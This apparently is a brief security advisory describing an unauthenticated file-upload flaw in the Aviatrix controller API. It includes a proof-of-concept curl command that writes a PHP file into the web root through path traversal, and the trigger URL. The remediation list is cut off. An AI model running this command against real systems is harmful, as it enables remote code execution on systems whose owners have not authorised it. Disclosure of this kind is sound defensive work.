While the Aviatrix UI requires authentication, many API calls do not enforce a check for authentication. Some of these API calls allow an unauthenticated attacker to upload arbitrary files, including
.php scripts, to the filesystem. These uploaded scripts will be processed by the web frontend, allowing an attacker to run code of their choosing.
curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/test.php -d 'data=hello<?php phpinfo()?>'
https://aviatrix.domain.tld/v1/test. This will show the PHP Version page.
Upgrade to one of the following versions: